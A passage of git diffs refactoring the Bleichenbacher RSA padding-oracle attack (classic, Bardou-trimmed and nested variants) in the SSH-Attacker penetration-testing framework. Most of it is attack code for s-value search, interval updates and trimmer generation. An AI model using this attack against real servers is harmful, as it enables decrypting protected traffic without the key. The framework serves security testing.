BigInteger e, BigInteger n */ private BigInteger find_smallest_s( BigInteger lowerBound, byte[] ciphertext, CustomRsaPublicKey rsaPublicKey) { - BigInteger s = lowerBound; - LOGGER.debug("Searching for smallest s, beginning at: {}", lowerBound.toString(16)); - LOGGER.debug("Ciphertext: {} ", bytesToHex(ciphertext)); - - while (true) { - // (c * pow(s,e,n)) % n - /* BigInteger exponentiated = - s.modPow(rsaPublicKey.getPublicExponent(), rsaPublicKey.getModulus()); - BigInteger cipher = new BigInteger(1, ciphertext); - BigInteger res = cipher.multiply(exponentiated); - BigInteger attempt = res.mod(rsaPublicKey.getModulus()); - */ - - BigInteger attempt = - manipulateCiphertext( - s, - rsaPublicKey.getPublicExponent(), - rsaPublicKey.getModulus(), - ciphertext); - - boolean oracleResult = queryOracle(attempt, false); - - if (counterOuterBleichenbacher == 0) { - LOGGER.fatal( - ArrayConverter.bytesToHexString( - ArrayConverter.bigIntegerToByteArray(attempt))); - } - counterOuterBleichenbacher++; + return find_smallest_s(lowerBound, ciphertext, rsaPublicKey, null); + } - if (oracleResult) { - LOGGER.fatal( - ArrayConverter.bytesToHexString( - ArrayConverter.bigIntegerToByteArray(attempt))); - // System.exit(0); - return s; - } - s = s.add(BigInteger.ONE); - } + /** + * Searches for a valid s-value in a given range of possible s-values of a BB-Attack + * + * @param lowerBound the lower bound for the possible s-values + * @param upperBound the upper boud for the possible s-values + * @param previousS the last s which was found, + * @param ciphertext the ciphertext, for which the s-values should be found + * @param rsaPublicKey the public-key for which the s-values should be found + * @return + */ + private BigInteger find_s_in_range( + BigInteger lowerBound, + BigInteger upperBound, + BigInteger previousS, + byte[] ciphertext, + CustomRsaPublicKey rsaPublicKey) { + return find_s_in_range(lowerBound, upperBound, previousS, ciphertext, rsaPublicKey, null); } /** @@ -166,17 +128,16 @@ private BigInteger find_smallest_s( * @param outerKey the rsa-public-key for the outer encryption, encrypting the generated s-value * @return the smallest s-value, which generates a valid PKCS#1 Ciphertext */ - private BigInteger find_smallest_s_nested( + private BigInteger find_smallest_s( BigInteger lowerBound, byte[] ciphertext, CustomRsaPublicKey rsaPublicKey, CustomRsaPublicKey outerKey) { + BigInteger s = lowerBound; - // LOGGER.debug("Searching for smallest s, beginning at: {}", lowerBound.toString(16)); - // LOGGER.debug("Ciphertext: {}", bytesToHex(ciphertext)); + boolean oracleResult; while (true) { - // (c * pow(s,e,n)) % n BigInteger attempt = manipulateCiphertext( s, @@ -184,16 +145,26 @@ private BigInteger find_smallest_s_nested( rsaPublicKey.getModulus(), ciphertext); - BigInteger encryptedAttempt = encryptBigInt(attempt, outerKey); + if (outerKey != null) { + BigInteger encryptedAttempt = encryptBigInt(attempt, outerKey); - boolean oracleResult = queryOracle(encryptedAttempt, true); - counterInnerBleichenbacher++; + oracleResult = queryOracle(encryptedAttempt, true); + counterInnerBleichenbacher++; + + } else { + oracleResult = queryOracle(attempt, false); + if (counterOuterBleichenbacher == 0) { + LOGGER.fatal( + ArrayConverter.bytesToHexString( + ArrayConverter.bigIntegerToByteArray(attempt))); + } + counterOuterBleichenbacher++; + } if (oracleResult) { LOGGER.fatal( ArrayConverter.bytesToHexString( - ArrayConverter.bigIntegerToByteArray(encryptedAttempt))); - LOGGER.debug("Found smallest s: {}", s); + ArrayConverter.bigIntegerToByteArray(attempt))); return s; } @@ -213,42 +184,33 @@ private BigInteger find_smallest_s_nested( * @param outerKey the outer encryption key * @return */ - private BigInteger find_s_in_range_nested( + private BigInteger find_s_in_range( BigInteger lowerBound, BigInteger upperBound, BigInteger previousS, byte[] ciphertext, CustomRsaPublicKey rsaPublicKey, CustomRsaPublicKey outerKey) { - /* LOGGER.debug( - "Searching for s in range from {} to {}", - lowerBound.toString(16), - upperBound.toString(16));*/ + boolean oracleResult; // ri = ceil(2 * (b * prev_s - 2 * B), n) BigInteger bTimesPrevs = upperBound.multiply(previousS); BigInteger bTimePrevsSubTwoB = bTimesPrevs.subtract(two_B); - BigInteger ri = ceil(big_two.multiply(bTimePrevsSubTwoB), rsaPublicKey.getModulus()); + BigInteger ri = + MathHelper.ceil(big_two.multiply(bTimePrevsSubTwoB), rsaPublicKey.getModulus()); while (true) { // si_lower = ceil(2 * B + ri * n, b) // si_upper = ceil(3 * B + ri * n, a) BigInteger rITimesN = ri.multiply(rsaPublicKey.getModulus()); - BigInteger si_lower = ceil(two_B.add(rITimesN), upperBound); - BigInteger si_upper = ceil(three_B.add(rITimesN), lowerBound); + BigInteger si_lower = MathHelper.ceil(two_B.add(rITimesN), upperBound); + BigInteger si_upper = MathHelper.ceil(three_B.add(rITimesN), lowerBound); for (BigInteger si = si_lower; si.compareTo(si_upper) < 0; si = si.add(BigInteger.ONE)) { - // (c * pow(si, e, n)) % n - /* BigInteger exponentiated = - si.modPow(rsaPublicKey.getPublicExponent(), rsaPublicKey.getModulus()); - BigInteger cipher = new BigInteger(1, ciphertext); - BigInteger res = cipher.multiply(exponentiated); - BigInteger attempt = res.mod(rsaPublicKey.getModulus());*/ - BigInteger attempt = manipulateCiphertext( si, @@ -256,80 +218,20 @@ private BigInteger find_s_in_range_nested( rsaPublicKey.getModulus(), ciphertext); - BigInteger encryptedAttempt = encryptBigInt(attempt, outerKey); - boolean oracleResult = queryOracle(encryptedAttempt, true); - counterInnerBleichenbacher++; - - if (oracleResult) { - return si; + if (outerKey != null) { + BigInteger encryptedAttempt = encryptBigInt(attempt, outerKey); + oracleResult = queryOracle(encryptedAttempt, true); + counterInnerBleichenbacher++; + } else { + oracleResult = queryOracle(attempt, false); + counterOuterBleichenbacher++; } - } - - ri = ri.add(BigInteger.ONE); - } - } - - /** - * Searches for a valid s-value in a given range of possible s-values of a BB-Attack - * - * @param lowerBound the lower bound for the possible s-values - * @param upperBound the upper boud for the possible s-values - * @param previousS the last s which was found, - * @param ciphertext the ciphertext, for which the s-values should be found - * @param rsaPublicKey the public-key for which the s-values should be found - * @return - */ - private BigInteger find_s_in_range( - BigInteger lowerBound, - BigInteger upperBound, - BigInteger previousS, - byte[] ciphertext, - CustomRsaPublicKey rsaPublicKey) { - /* - LOGGER.debug( - "Searching for s in range from {} to {}", - lowerBound.toString(16), - upperBound.toString(16)); - */ - - // ri = ceil(2 * (b * prev_s - 2 * B), n) - BigInteger bTimesPrevs = upperBound.multiply(previousS); - BigInteger bTimePrevsSubTwoB = bTimesPrevs.subtract(two_B); - BigInteger ri = ceil(big_two.multiply(bTimePrevsSubTwoB), rsaPublicKey.getModulus()); - - while (true) { - - // si_lower = ceil(2 * B + ri * n, b) - // si_upper = ceil(3 * B + ri * n, a) - BigInteger rITimesN = ri.multiply(rsaPublicKey.getModulus()); - BigInteger si_lower = ceil(two_B.add(rITimesN), upperBound); - BigInteger si_upper = ceil(three_B.add(rITimesN), lowerBound); - - for (BigInteger si = si_lower; - si.compareTo(si_upper) < 0; - si = si.add(BigInteger.ONE)) { - - // (c * pow(si, e, n)) % n - /* BigInteger exponentiated = - si.modPow(rsaPublicKey.getPublicExponent(), rsaPublicKey.getModulus()); - BigInteger cipher = new BigInteger(1, ciphertext); - BigInteger res = cipher.multiply(exponentiated); - BigInteger attempt = res.mod(rsaPublicKey.getModulus());*/ - - BigInteger attempt = - manipulateCiphertext( - si, - rsaPublicKey.getPublicExponent(), - rsaPublicKey.getModulus(), - ciphertext); - - boolean oracleResult = queryOracle(attempt, false); - counterOuterBleichenbacher++; if (oracleResult) { return si; } } + ri = ri.add(BigInteger.ONE); } } @@ -350,12 +252,6 @@ static List safeIntervalInsert(List M, Interval intervalToIn BigInteger lb = chosenInterval.lower.min(intervalToInsert.lower); BigInteger ub = chosenInterval.upper.max(intervalToInsert.upper); M.set(i, new Interval(lb, ub)); - /* LOGGER.debug( - "Overlap found, inserting lowerBound: {} upperboudn: {} into new M [{}] = {}", - lb.toString(16), - ub.toString(16), - i, - M.toString());*/ return M; } } @@ -382,53 +278,31 @@ private List updateInterval( BigInteger lowerTimesS = chosenInterval.lower.multiply(s); BigInteger lowerPartForCeil = lowerTimesS.subtract(three_B_plus_one); - BigInteger r_lower = ceil(lowerPartForCeil, rsaPublicKey.getModulus()); + BigInteger r_lower = MathHelper.ceil(lowerPartForCeil, rsaPublicKey.getModulus()); - /* LOGGER.debug( - "found r_lower: {} from lowerPartForCeil: {}", - r_lower.toString(16), - lowerPartForCeil.toString(16)); - */ /* b * s - 2 * B */ BigInteger upperTimesS = chosenInterval.upper.multiply(s); BigInteger upperPartForCeil = upperTimesS.subtract(two_B); - BigInteger r_upper = ceil(upperPartForCeil, rsaPublicKey.getModulus()); - /* - LOGGER.debug( - "found r_upper: {} from upperPartForCeil: {}", - r_upper.toString(16), - upperPartForCeil.toString(16)); - - LOGGER.debug("Compare:{}", r_lower.compareTo(r_upper)); - */ + BigInteger r_upper = MathHelper.ceil(upperPartForCeil, rsaPublicKey.getModulus()); for (BigInteger r = r_lower; r.compareTo(r_upper) < 0; r = r.add(BigInteger.ONE)) { BigInteger lowerBound = chosenInterval.lower; BigInteger upperBound = chosenInterval.upper; BigInteger lowerUpperBound = - ceil(two_B.add(r.multiply(rsaPublicKey.getModulus())), s); + MathHelper.ceil(two_B.add(r.multiply(rsaPublicKey.getModulus())), s); lowerBound = lowerBound.max(lowerUpperBound); - // LOGGER.debug("found lowerBound: {}", lowerBound.toString(16)); BigInteger upperUpperBound = - floor(three_B_sub_one.add(r.multiply(rsaPublicKey.getModulus())), s); + MathHelper.floor( + three_B_sub_one.add(r.multiply(rsaPublicKey.getModulus())), s); upperBound = upperBound.min(upperUpperBound); - // LOGGER.debug("found upperBound: {}", upperBound.toString(16)); Interval interim_interval = new Interval(lowerBound, upperBound); - /*LOGGER.debug( - "new Interval to insert lower: {} upper: {}", - interim_interval.lower.toString(16), - interim_interval.upper.toString(16)); - */ + M_new = safeIntervalInsert(M_new, interim_interval); - /*LOGGER.debug( - "safeinserting in M_new lower: {} M upper: {}", - M_new.get(0).lower.toString(16), - M_new.get(0).upper.toString(16));*/ } } @@ -482,14 +356,8 @@ private byte[] nestedBleichenbacher( three_B_sub_one = three_B.subtract(BigInteger.ONE); three_B_plus_one = three_B.add(BigInteger.ONE); - // LOGGER.debug("Starting with outer BB {} ", ArrayConverter.bytesToHexString(ciphertext)); - byte[] encoded_inner_ciphertext = bleichenbacher(ciphertext, outerPublicKey, classic); - // LOGGER.debug("got inner BB {}", ArrayConverter.bytesToHexString(ciphertext)); + byte[] encoded_inner_ciphertext = outerBleichenbacher(ciphertext, outerPublicKey, classic); byte[] innerCiphertext = pkcs1Decode(encoded_inner_ciphertext); - // LOGGER.debug("Decoded inner BB into {}", - // ArrayConverter.bytesToHexString(innerCiphertext)); - - // LOGGER.debug("Switching to inner Ciphertext, cracked outer successful"); B = big_two.pow(8 * (innerK - 2)); two_B = B.multiply(big_two); @@ -500,6 +368,91 @@ private byte[] nestedBleichenbacher( return innerBleichenbacher(innerCiphertext, innerPublicKey, outerPublicKey, classic); } + private List trimM0( + byte[] ciphertext, + CustomRsaPublicKey innerPublicKey, + CustomRsaPublicKey outerPublicKey, + int maxTrimmers) { + + List M = new ArrayList<>(); + + ArrayList trimmers = new ArrayList<>(); + trimmers = getPaires(maxTrimmers); + ArrayList utPairs = new ArrayList<>(); + + for (int[] ut : trimmers) { + int u = ut[0]; + int t = ut[1]; + + BigInteger uBI = BigInteger.valueOf(u); + BigInteger tBI = BigInteger.valueOf(t); + + BigInteger cipherbig = new BigInteger(1, ciphertext); + + BigInteger result = + cipherbig + .multiply( + (uBI.multiply(tBI.modInverse(innerPublicKey.getModulus()))) + .modPow( + innerPublicKey.getPublicExponent(), + innerPublicKey.getModulus())) + .mod(innerPublicKey.getModulus()); + if (outerPublicKey != null) { + BigInteger encryptedAttempt = encryptBigInt(result, outerPublicKey); + + if (queryOracle( + encryptedAttempt, + true)) { // assuming the oracle and util method exists and does what + // expected + utPairs.add(new int[] {u, t}); + } + } else { + if (queryOracle(result, false)) { + utPairs.add(new int[] {u, t}); + } + } + } + + if (!utPairs.isEmpty()) { + + ArrayList t_values = new ArrayList<>(); + for (int[] pair : utPairs) { + t_values.add(pair[1]); + } + + int t_prime = MathHelper.findLeastCommonMultiple(t_values); + + int u_min = Integer.MAX_VALUE; + int u_max = Integer.MIN_VALUE; + for (int[] pair : utPairs) { + int current = pair[0] * t_prime / pair[1]; + if (current < u_min) { + u_min = current; + } + if (current > u_max) { + u_max = current; + } + } + + BigInteger a = + two_B.multiply(BigInteger.valueOf(t_prime)).divide(BigInteger.valueOf(u_min)); + BigInteger b = + three_B_sub_one + .multiply(BigInteger.valueOf(t_prime)) + .divide(BigInteger.valueOf(u_max)); + + M = new ArrayList<>(); + M.add(new Interval(a, b)); + LOGGER.debug("done. trimming M0 iterations: [{},{}]", a, b); + + } else { + LOGGER.debug("utPaires where empty, falling back to 2B and 3B-1"); + M = new ArrayList<>(); + M.add(new Interval(two_B, three_B_sub_one)); + } + return M; + } + /** * Perform the inner Bleichenbacher algorithm. * @@ -535,103 +488,17 @@ private byte[] innerBleichenbacher( M.get(0).lower.toString(16), M.get(0).upper.toString(16)); if (!classic) { - ArrayList trimmers = new ArrayList<>(); - for (int t = 2; t <= Math.pow(2, 12) + 1; t++) { - if (t <= 50) { - for (int u = Math.floorDiv(2 * t, 3); u <= Math.floorDiv(3 * t, 2); u++) { - if (BigInteger.valueOf(u) - .gcd(BigInteger.valueOf(t)) - .equals(BigInteger.ONE)) { - trimmers.add(new int[] {u, t}); - } - } - } else { // t > 50 - trimmers.add(new int[] {t - 1, t}); - trimmers.add(new int[] {t + 1, t}); - } - } - ArrayList utPairs = new ArrayList<>(); - - for (int[] ut : trimmers) { - int u = ut[0]; - int t = ut[1]; - BigInteger uBI = BigInteger.valueOf(u); - BigInteger tBI = BigInteger.valueOf(t); - - BigInteger cipherbig = new BigInteger(1, ciphertext); - - BigInteger result = - cipherbig - .multiply( - (uBI.multiply(tBI.modInverse(innerPublicKey.getModulus()))) - .modPow( - innerPublicKey.getPublicExponent(), - innerPublicKey.getModulus())) - .mod(innerPublicKey.getModulus()); - - BigInteger encryptedAttempt = encryptBigInt(result, outerPublicKey); - - if (queryOracle( - encryptedAttempt, - true)) { // assuming the oracle and util method exists and does what - // expected - utPairs.add(new int[] {u, t}); - } - } - - if (!utPairs.isEmpty()) { - - ArrayList t_values = new ArrayList<>(); - for (int[] pair : utPairs) { - t_values.add(pair[1]); - } - - int t_prime = lcm_n(t_values); - - int u_min = Integer.MAX_VALUE; - int u_max = Integer.MIN_VALUE; - for (int[] pair : utPairs) { - int current = pair[0] * t_prime / pair[1]; - if (current < u_min) { - u_min = current; - } - if (current > u_max) { - u_max = current; - } - } - - BigInteger a = - two_B.multiply(BigInteger.valueOf(t_prime)) - .divide(BigInteger.valueOf(u_min)); - BigInteger b = - three_B_sub_one - .multiply(BigInteger.valueOf(t_prime)) - .divide(BigInteger.valueOf(u_max)); - - M = new ArrayList<>(); - M.add(new Interval(a, b)); - LOGGER.debug("done. trimming M0 iterations: [{},{}]", a, b); - } else { - LOGGER.debug("UT-Paris where empty"); - } - - s = - find_smallest_s_nested( - ceil(innerPublicKey.getModulus().add(two_B), M.get(0).lower), - ciphertext, - innerPublicKey, - outerPublicKey); - - } else { - s = - find_smallest_s_nested( - ceil(innerPublicKey.getModulus(), three_B), - ciphertext, - innerPublicKey, - outerPublicKey); + M = trimM0(ciphertext, innerPublicKey, outerPublicKey, 5000); } + s = + find_smallest_s( + MathHelper.ceil(innerPublicKey.getModulus().add(two_B), M.get(0).upper), + ciphertext, + innerPublicKey, + outerPublicKey); + LOGGER.debug( "found s, initial updating M lower: {} M upper: {}", M.get(0).lower.toString(16), @@ -643,7 +510,7 @@ private byte[] innerBleichenbacher( while (true) { if (M.size() >= 2) { s = - find_smallest_s_nested( + find_smallest_s( s.add(BigInteger.ONE), ciphertext, innerPublicKey, outerPublicKey); } else if (M.size() == 1) { BigInteger a = M.get(0).lower; @@ -651,42 +518,12 @@ private byte[] innerBleichenbacher( if (a.equals(b)) { return ArrayConverter.bigIntegerToByteArray(a); } - s = find_s_in_range_nested(a, b, s, ciphertext, innerPublicKey, outerPublicKey); + s = find_s_in_range(a, b, s, ciphertext, innerPublicKey, outerPublicKey); } M = updateInterval(M, s, innerPublicKey); } } - // Define the lcm method - public static int lcm(int a, int b) { - int tempA = a; - int tempB = b; - while (tempB != 0) { - int temp = tempB; - tempB = tempA % tempB; - tempA = temp; - } - return a * (b / tempA); - } - - // Define the lcm_n method - public static int lcm_n(ArrayList list) { - ArrayList ns = new ArrayList<>(list); - int log = (int) (Math.log(ns.size()) / Math.log(2) + 1); - for (int i = 0; i < log; i++) { - ArrayList finalNs = ns; - List nsNext = - IntStream.range(0, ns.size() / 2) - .mapToObj(k -> lcm(finalNs.get(2 * k), finalNs.get(2 * k + 1))) - .collect(Collectors.toList()); - if (ns.size() % 2 != 0) { - nsNext.add(ns.get(ns.size() - 1)); - } - ns = new ArrayList<>(nsNext); - } - return ns.get(0); - } - /** * The Bleichenbacher-Attacke for single-encrypted ciphertexts * @@ -694,8 +531,9 @@ public static int lcm_n(ArrayList list) { * @param publicKey The known public key, which was used to encrypt the ciphertext * @return the decrypted ciphertext, whith a valid PKCS#1 Padding */ - private byte[] bleichenbacher( + private byte[] outerBleichenbacher( byte[] ciphertext, CustomRsaPublicKey publicKey, boolean classic) { + MathHelper mathHelper = new MathHelper(); int bitsize = publicKey.getModulus().bitLength(); int k = bitsize / 8; @@ -719,97 +557,16 @@ private byte[] bleichenbacher( BigInteger s; if (!classic) { - ArrayList trimmers = new ArrayList<>(); - for (int t = 2; t <= Math.pow(2, 12) + 1; t++) { - if (t <= 50) { - for (int u = Math.floorDiv(2 * t, 3); u <= Math.floorDiv(3 * t, 2); u++) { - if (BigInteger.valueOf(u) - .gcd(BigInteger.valueOf(t)) - .equals(BigInteger.ONE)) { - trimmers.add(new int[] {u, t}); - } - } - } else { // t > 50 - trimmers.add(new int[] {t - 1, t}); - trimmers.add(new int[] {t + 1, t}); - } - } - ArrayList utPairs = new ArrayList<>(); - - for (int[] ut : trimmers) { - int u = ut[0]; - int t = ut[1]; - - BigInteger uBI = BigInteger.valueOf(u); - BigInteger tBI = BigInteger.valueOf(t); - - BigInteger cipherbig = new BigInteger(1, ciphertext); - - BigInteger result = - cipherbig - .multiply( - (uBI.multiply(tBI.modInverse(publicKey.getModulus()))) - .modPow( - publicKey.getPublicExponent(), - publicKey.getModulus())) - .mod(publicKey.getModulus()); - - if (queryOracle( - result, - false)) { // assuming the oracle and util method exists and does what - // expected - utPairs.add(new int[] {u, t}); - } - } - - if (!utPairs.isEmpty()) { - - ArrayList t_values = new ArrayList<>(); - for (int[] pair : utPairs) { - t_values.add(pair[1]); - } - - int t_prime = lcm_n(t_values); - - int u_min = Integer.MAX_VALUE; - int u_max = Integer.MIN_VALUE; - for (int[] pair : utPairs) { - int current = pair[0] * t_prime / pair[1]; - if (current < u_min) { - u_min = current; - } - if (current > u_max) { - u_max = current; - } - } - - BigInteger a = - two_B.multiply(BigInteger.valueOf(t_prime)) - .divide(BigInteger.valueOf(u_min)); - BigInteger b = - three_B_sub_one - .multiply(BigInteger.valueOf(t_prime)) - .divide(BigInteger.valueOf(u_max)); - - M = new ArrayList<>(); - M.add(new Interval(a, b)); - LOGGER.debug("done. trimming M0 iterations: [{},{}]", a, b); - } else { - LOGGER.debug("UT-Paris where empty"); - } - // Search for s1 with improved start-conditions from Bardou - s = - find_smallest_s( - ceil(publicKey.getModulus().add(two_B), M.get(0).lower), - ciphertext, - publicKey); - - } else { - // do the regular search for s1 as described in the original paper - s = find_smallest_s(ceil(publicKey.getModulus(), three_B), ciphertext, publicKey); + M = trimM0(ciphertext, publicKey, null, 1000); } + s = + find_smallest_s( + mathHelper.ceil(publicKey.getModulus().add(two_B), M.get(0).upper), + ciphertext, + publicKey); + LOGGER.debug( "found s, initial updating M lower: {} M upper: {}", M.get(0).lower.toString(16), @@ -847,6 +604,60 @@ private String bytesToHex(byte[] bytes) { return result.toString(); } + private BigInteger[] ensureRange(BigInteger ucandidate, BigInteger tcandidate) { + float quotient = ucandidate.floatValue() / tcandidate.floatValue(); + + // if we get to big - choose next value for t, reset u to 1 + if (quotient >= (3.0F / 2.0F)) { + ucandidate = BigInteger.valueOf(1); + tcandidate = tcandidate.add(BigInteger.ONE); + quotient = ucandidate.floatValue() / tcandidate.floatValue(); + } + // test if wie are too small, add up u until we are above 2/3 + while (quotient <= (2.0F / 3.0F)) { + ucandidate = ucandidate.add(BigInteger.ONE); + quotient = ucandidate.floatValue() / tcandidate.floatValue(); + } + + // return if the range is hold + return new BigInteger[] {ucandidate, tcandidate}; + } + + /** + * Retrieves u/t paires for improved bb attack as mentioned by Bardou 2012 + * + * @param maxPairs the maximum number of pairs to retrieve + * @return an ArrayList of int arrays representing the pairs of integers + */ + private ArrayList getPaires(int maxPairs) { + ArrayList paires = new ArrayList<>(); + BigInteger u = BigInteger.valueOf(1); + BigInteger t = BigInteger.valueOf(2); + + // as long as we are not above t < 2^12 and the max number of paires isn`t reached - go on + // searching + while ((t.compareTo(BigInteger.valueOf(2).pow(12)) < 0) && paires.size() < maxPairs) { + BigInteger[] result = ensureRange(u, t); + u = result[0]; + t = result[1]; + + // while u and t are not coprime - add up u and test again + // every run test if we are in range, otherwise correct + while (u.gcd(t).compareTo(BigInteger.valueOf(1)) != 0) { + u = u.add(BigInteger.ONE); + BigInteger[] result2 = ensureRange(u, t); + u = result2[0]; + t = result2[1]; + } + + // Pair found -> add to paires and add u one up + paires.add(new int[] {u.intValue(), t.intValue()}); + u = u.add(BigInteger.ONE); + } + + return paires; + } + /** * A helper function to remove a PKCS#1-encoded-Padding * @@ -904,15 +715,7 @@ public int getCounterInnerBleichenbacher() { return counterInnerBleichenbacher; } - public void setCounterInnerBleichenbacher(int counterInnerBleichenbacher) { - this.counterInnerBleichenbacher = counterInnerBleichenbacher; - } - public int getCounterOuterBleichenbacher() { return counterOuterBleichenbacher; } - - public void setCounterOuterBleichenbacher(int counterOuterBleichenbacher) { - this.counterOuterBleichenbacher = counterOuterBleichenbacher; - } } diff --git a/Attacks/src/main/java/de/rub/nds/sshattacker/attacks/pkcs1/util/MathHelper.java b/Attacks/src/main/java/de/rub/nds/sshattacker/attacks/pkcs1/util/MathHelper.java new file mode 100644 index 000000000..b9513fd5a --- /dev/null +++ b/Attacks/src/main/java/de/rub/nds/sshattacker/attacks/pkcs1/util/MathHelper.java @@ -0,0 +1,81 @@ +/* + * SSH-Attacker - A Modular Penetration Testing Framework for SSH + * + * Copyright 2014-2024 Ruhr University Bochum, Paderborn University, and Hackmanit GmbH + * + * Licensed under Apache License 2.0 http://www.apache.org/licenses/LICENSE-2.0 + */ +package de.rub.nds.sshattacker.attacks.pkcs1.util; + +import java.math.BigInteger; +import java.util.ArrayList; + +/** + * The MathHelper class provides various mathematical helper methods. + */ +public class MathHelper { + + public MathHelper() {} + + public static BigInteger floor(BigInteger a, BigInteger b) { + return a.divide(b); + } + + /** + * Divides a BigInteger number 'a' by another BigInteger number 'b' and returns the ceiling of + * the result. + * + * @param a The BigInteger number to be divided + * @param b The BigInteger number that is the divisor + * @return The ceiling of the division result + */ + public static BigInteger ceil(BigInteger a, BigInteger b) { + BigInteger c = a.mod(b); + if (c.compareTo(BigInteger.ZERO) > 0) { + return a.divide(b).add(BigInteger.ONE); + } else { + return a.divide(b); + } + } + + /** + * Finds the Greatest Common Divisor (GCD) of two integers. + * + * @param num1 The first integer + * @param num2 The second integer + * @return The GCD of the two integers + */ + public static int findGCD(int num1, int num2) { + if (num2 == 0) { + return num1; + } + return findGCD(num2, num1 % num2); + } + + /** + * Finds the Least Common Multiple (LCM) of two integers. + * + * @param num1 The first integer + * @param num2 The second integer + * @return The LCM of the two integers + */ + public static int findLCM(int num1, int num2) { + return (num1 * num2) / findGCD(num1, num2); + } + + /** + * Finds the least common multiple (LCM) of a list of integers. + * + * @param numbers The list of integers + * @return The least common multiple (LCM) of the given integers + */ + public static int findLeastCommonMultiple(ArrayList numbers) { + int lcm_of_array_elements = 1; + int n = numbers.size(); + + for (int i = 0; i < n; i++) + lcm_of_array_elements = findLCM(lcm_of_array_elements, numbers.get(i)); + + return lcm_of_array_elements; + } +} From 553e29f3dbf56d769055b1cc798b41e5cfab6791 Mon Sep 17 00:00:00 2001 From: Steffen Brossler Date: Sat, 13 Jan 2024 00:28:10 +0100 Subject: [PATCH 127/176] Cleanup class --- .../attacks/pkcs1/Bleichenbacher.java | 177 +----------------- .../attacks/pkcs1/util/MathHelper.java | 4 +- .../attacks/pkcs1/util/TrimmerGenerator.java | 70 +++++++ 3 files changed, 81 insertions(+), 170 deletions(-) create mode 100644 Attacks/src/main/java/de/rub/nds/sshattacker/attacks/pkcs1/util/TrimmerGenerator.java diff --git a/Attacks/src/main/java/de/rub/nds/sshattacker/attacks/pkcs1/Bleichenbacher.java b/Attacks/src/main/java/de/rub/nds/sshattacker/attacks/pkcs1/Bleichenbacher.java index 46ae6ac72..9be20f3c0 100644 --- a/Attacks/src/main/java/de/rub/nds/sshattacker/attacks/pkcs1/Bleichenbacher.java +++ b/Attacks/src/main/java/de/rub/nds/sshattacker/attacks/pkcs1/Bleichenbacher.java @@ -10,6 +10,7 @@ import de.rub.nds.modifiablevariable.util.ArrayConverter; import de.rub.nds.sshattacker.attacks.pkcs1.oracles.Pkcs1Oracle; import de.rub.nds.sshattacker.attacks.pkcs1.util.MathHelper; +import de.rub.nds.sshattacker.attacks.pkcs1.util.TrimmerGenerator; import de.rub.nds.sshattacker.core.crypto.keys.CustomRsaPublicKey; import java.math.BigInteger; import java.security.InvalidKeyException; @@ -58,14 +59,6 @@ public Bleichenbacher( counterOuterBleichenbacher = 0; } - /** - * Calculates the floor division of two BigInteger numbers. - * - * @param a The BigInteger number to be divided. - * @param b The BigInteger number that is the divisor. - * @return The floor division of a by b as a BigInteger. - */ - /** * Manipulates the ciphertext by performing the following steps: 1. Computes the exponentiated * value of s using the public exponent e and modulus n. 2. Converts the ciphertext array c to a @@ -86,38 +79,6 @@ private BigInteger manipulateCiphertext(BigInteger s, BigInteger e, BigInteger n return res.mod(n); } - /** - * Searches the smallest suitable s-value for the BB-Attack - * - * @param lowerBound The smallest value where it makes sens to start searching - * @param ciphertext the ciphertext which should be checked against - * @param rsaPublicKey the public-key to the ciphertext, which should be used to encrypt - * @return the smallest s-value, which generates a valid PKCS#1 Ciphertext - */ - private BigInteger find_smallest_s( - BigInteger lowerBound, byte[] ciphertext, CustomRsaPublicKey rsaPublicKey) { - return find_smallest_s(lowerBound, ciphertext, rsaPublicKey, null); - } - - /** - * Searches for a valid s-value in a given range of possible s-values of a BB-Attack - * - * @param lowerBound the lower bound for the possible s-values - * @param upperBound the upper boud for the possible s-values - * @param previousS the last s which was found, - * @param ciphertext the ciphertext, for which the s-values should be found - * @param rsaPublicKey the public-key for which the s-values should be found - * @return - */ - private BigInteger find_s_in_range( - BigInteger lowerBound, - BigInteger upperBound, - BigInteger previousS, - byte[] ciphertext, - CustomRsaPublicKey rsaPublicKey) { - return find_s_in_range(lowerBound, upperBound, previousS, ciphertext, rsaPublicKey, null); - } - /** * Searches the smallest suitable s-value for the inner encryption of a nested (double * encrypted) BB-Attack. @@ -356,7 +317,7 @@ private byte[] nestedBleichenbacher( three_B_sub_one = three_B.subtract(BigInteger.ONE); three_B_plus_one = three_B.add(BigInteger.ONE); - byte[] encoded_inner_ciphertext = outerBleichenbacher(ciphertext, outerPublicKey, classic); + byte[] encoded_inner_ciphertext = Bleichenbacher(ciphertext, outerPublicKey, null, classic); byte[] innerCiphertext = pkcs1Decode(encoded_inner_ciphertext); B = big_two.pow(8 * (innerK - 2)); @@ -365,7 +326,7 @@ private byte[] nestedBleichenbacher( three_B_sub_one = three_B.subtract(BigInteger.ONE); three_B_plus_one = three_B.add(BigInteger.ONE); - return innerBleichenbacher(innerCiphertext, innerPublicKey, outerPublicKey, classic); + return Bleichenbacher(innerCiphertext, innerPublicKey, outerPublicKey, classic); } private List trimM0( @@ -373,11 +334,12 @@ private List trimM0( CustomRsaPublicKey innerPublicKey, CustomRsaPublicKey outerPublicKey, int maxTrimmers) { + TrimmerGenerator trimmerGenerator = new TrimmerGenerator(); - List M = new ArrayList<>(); + List M; - ArrayList trimmers = new ArrayList<>(); - trimmers = getPaires(maxTrimmers); + ArrayList trimmers; + trimmers = trimmerGenerator.getPaires(maxTrimmers); ArrayList utPairs = new ArrayList<>(); for (int[] ut : trimmers) { @@ -461,7 +423,7 @@ private List trimM0( * @param outerPublicKey The outer RSA public key. * @return The decrypted plaintext as a byte array. */ - private byte[] innerBleichenbacher( + private byte[] Bleichenbacher( byte[] ciphertext, CustomRsaPublicKey innerPublicKey, CustomRsaPublicKey outerPublicKey, @@ -488,8 +450,9 @@ private byte[] innerBleichenbacher( M.get(0).lower.toString(16), M.get(0).upper.toString(16)); if (!classic) { + int maxTrimmes = outerPublicKey != null ? 5000 : 1000; - M = trimM0(ciphertext, innerPublicKey, outerPublicKey, 5000); + M = trimM0(ciphertext, innerPublicKey, outerPublicKey, maxTrimmes); } s = @@ -524,72 +487,6 @@ private byte[] innerBleichenbacher( } } - /** - * The Bleichenbacher-Attacke for single-encrypted ciphertexts - * - * @param ciphertext The ciphertext, which should be decrypted - * @param publicKey The known public key, which was used to encrypt the ciphertext - * @return the decrypted ciphertext, whith a valid PKCS#1 Padding - */ - private byte[] outerBleichenbacher( - byte[] ciphertext, CustomRsaPublicKey publicKey, boolean classic) { - MathHelper mathHelper = new MathHelper(); - int bitsize = publicKey.getModulus().bitLength(); - int k = bitsize / 8; - - LOGGER.debug( - "bitsize: {}\nk: {}\nB: {}\n2B: {}\n3B: 